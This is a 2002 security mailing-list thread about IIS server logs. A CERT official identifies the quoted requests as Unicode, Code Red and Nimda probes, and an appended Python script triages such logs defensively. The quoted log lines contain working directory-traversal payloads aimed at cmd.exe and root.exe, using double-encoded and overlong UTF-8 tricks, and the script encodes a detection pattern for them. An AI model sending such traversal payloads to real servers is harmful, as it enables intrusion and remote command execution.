They look like Unicode + CodeRed and Nimda attacks.

Regards,
---------
Muhammad Faisal Rauf Danka
Chief Technology Officer
Gem Internet Services (Pvt) Ltd.
web: www.gem.net.pk
voice: 92-021-111-GEMNET

Vice President
Pakistan Computer Emergency Response Team (PakCERT)
web: www.pakcert.org

Chief Security Analyst
Applied Technology Research Center (ATRC)
web: www.atrc.net.pk
voice: 92-21-4980523 92-21-4974781

"Great is the Art of beginning, but Greater is the Art of ending."

--- Craig Brauckmiller <[EMAIL PROTECTED]> wrote:
>
> Hello all and forgive my ignorance in this area.
>
> We are in the process of bringing our website in house. It was being hosted externally.
> The site is almost up and I was just poking at the logs and was intrigued by what I saw.
>
> Below is a snippet from the logs. Can anyone tell by looking at it:
>
> 1. What type of vulnerabilities were they looking for?
> 2. Does the fact that it says <Rejected by urlscan> imply that URLScan from M$ is loaded? I didn't do this myself... that's why I'm curious.
> 3. What is the best course of action in regards to the individual attempting these activities? I traced the IP back to RoadRunner. Should I call their customer service and complain, or am I just pissing in the wind?
> 4. I did run the IIS Lockdown wizard. Is that sufficient for most types of attacks? What other tools should I consider running?
>
> #Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status sc-win32-status cs(User-Agent)
> 2002-05-10 02:27:00 65.27.56.236 - 10.2.32.20 80 GET /<Rejected-By-UrlScan> ~/scripts/root.exe 404 123 -
> 2002-05-10 02:27:00 65.27.56.236 - 10.2.32.20 80 GET /<Rejected-By-UrlScan> ~/MSADC/root.exe 404 123 -
> 2002-05-10 02:27:01 65.27.56.236 - 10.2.32.20 80 GET /<Rejected-By-UrlScan> ~/c/winnt/system32/cmd.exe 404 123 -
> 2002-05-10 02:27:01 65.27.56.236 - 10.2.32.20 80 GET /<Rejected-By-UrlScan> ~/d/winnt/system32/cmd.exe 404 123 -
> 2002-05-10 02:27:01 65.27.56.236 - 10.2.32.20 80 GET /<Rejected-By-UrlScan> ~/scripts/..%255c../winnt/system32/cmd.exe 404 123 -
> 2002-05-10 02:27:01 65.27.56.236 - 10.2.32.20 80 GET /<Rejected-By-UrlScan> ~/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe 404 123 -
> 2002-05-10 02:27:01 65.27.56.236 - 10.2.32.20 80 GET /<Rejected-By-UrlScan> ~/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe 404 123 -
> 2002-05-10 02:27:03 65.27.56.236 - 10.2.32.20 80 GET /<Rejected-By-UrlScan> ~/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe 404 123 -
> 2002-05-10 02:27:03 65.27.56.236 - 10.2.32.20 80 GET /<Rejected-By-UrlScan> ~/scripts/..%c1%1c../winnt/system32/cmd.exe 404 123 -
> 2002-05-10 02:27:04 65.27.56.236 - 10.2.32.20 80 GET /<Rejected-By-UrlScan> ~/scripts/..%c0%2f../winnt/system32/cmd.exe 404 123 -
> 2002-05-10 02:27:04 65.27.56.236 - 10.2.32.20 80 GET /<Rejected-By-UrlScan> ~/scripts/..%c0%af../winnt/system32/cmd.exe 404 123 -
> 2002-05-10 02:27:05 65.27.56.236 - 10.2.32.20 80 GET /<Rejected-By-UrlScan> ~/scripts/..%c1%9c../winnt/system32/cmd.exe 404 123 -
> 2002-05-10 02:27:09 65.27.56.236 - 10.2.32.20 80 GET /<Rejected-By-UrlScan> ~/scripts/..%%35%63../winnt/system32/cmd.exe 404 123 -
> 2002-05-10 02:27:11 65.27.56.236 - 10.2.32.20 80 GET /<Rejected-By-UrlScan> ~/scripts/..%%35c../winnt/system32/cmd.exe 404 123 -
> 2002-05-10 02:27:12 65.27.56.236 - 10.2.32.20 80 GET /<Rejected-By-UrlScan> ~/scripts/..%25%35%63../winnt/system32/cmd.exe 404 123 -
> 2002-05-10 02:27:12 65.27.56.236 - 10.2.32.20 80 GET /<Rejected-By-UrlScan> ~/scripts/..%252f../winnt/system32/cmd.exe 404 123 -
>
> Thanks so much for this great list.
>
> Craig Brauckmiller
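An added example, not part of the thread: a small Python triage script for IIS W3C extended logs like the one quoted above. It undoes the two encoding tricks UrlScan rejected here (overlong UTF-8 from the IIS Unicode bug, and `%25`-style double encoding), tags each record as traversal and/or a root.exe / cmd.exe probe, and reports the source address, so the same question can be answered from a full log rather than by reading it line by line. The sample records are constructed from the quoted log plus one benign request; the tag names are mine, and the `~`-prefixed original URL in `cs-uri-query` is taken from how the rejected requests appear in that log.

```python
import re
from urllib.parse import unquote

# Constructed sample in IIS W3C extended format, modelled on the quoted log, plus one benign request.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status sc-win32-status cs(User-Agent)
2002-05-10 02:27:00 65.27.56.236 - 10.2.32.20 80 GET /<Rejected-By-UrlScan> ~/scripts/root.exe 404 123 -
2002-05-10 02:27:01 65.27.56.236 - 10.2.32.20 80 GET /<Rejected-By-UrlScan> ~/scripts/..%255c../winnt/system32/cmd.exe 404 123 -
2002-05-10 02:27:04 65.27.56.236 - 10.2.32.20 80 GET /<Rejected-By-UrlScan> ~/scripts/..%c0%af../winnt/system32/cmd.exe 404 123 -
2002-05-10 02:27:11 65.27.56.236 - 10.2.32.20 80 GET /<Rejected-By-UrlScan> ~/scripts/..%%35c../winnt/system32/cmd.exe 404 123 -
2002-05-10 02:30:00 192.0.2.7 - 10.2.32.20 80 GET /index.htm - 200 0 Mozilla/4.0
"""

# C0/C1 lead bytes mark overlong UTF-8 that can only spell ASCII; strict decoders reject it, IIS 4/5 did not.
OVERLONG = re.compile(r"%(c[01])%([0-9a-f]{2})", re.IGNORECASE)

def lax_decode(url):
    """Decode the forgiving way IIS did; returns (decoded path, set of encoding tricks used)."""
    tricks = set()
    def fold(m):  # rebuild the code point from the low bits, as the lenient decoder did
        b1, b2 = int(m.group(1), 16), int(m.group(2), 16)
        return chr(((b1 & 0x1F) << 6) | (b2 & 0x3F))
    s = OVERLONG.sub(fold, url)
    if s != url:
        tricks.add("overlong-utf8")
    once = unquote(s)
    s = unquote(once)
    if s != once:  # %255c -> %5c -> '\': a second decoding pass still changed the string
        tricks.add("double-decode")
    return s.replace("\\", "/"), tricks

def triage_log(text):
    fields, hits = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        parts = line.split()
        if line.startswith("#") or len(parts) != len(fields):
            continue
        rec = dict(zip(fields, parts))
        blocked = rec["cs-uri-stem"] == "/<Rejected-By-UrlScan>"
        # A rejected request is logged with the original URL, '~'-prefixed, in cs-uri-query.
        url = rec["cs-uri-query"].lstrip("~") if blocked else rec["cs-uri-stem"]
        decoded, tags = lax_decode(url)
        if "/../" in decoded:
            tags.add("traversal")
        if decoded.lower().endswith(("/root.exe", "/cmd.exe")):
            tags.add("shell-probe")  # root.exe: Code Red II/Nimda backdoor copy of cmd.exe
        if tags:
            hits.append({"ip": rec["c-ip"], "blocked": blocked, "decoded": decoded, "tags": sorted(tags)})
    return hits
```

Every hit carries `blocked=True`, which answers the UrlScan question directly: the marker in `cs-uri-stem` only appears when UrlScan rejected the request.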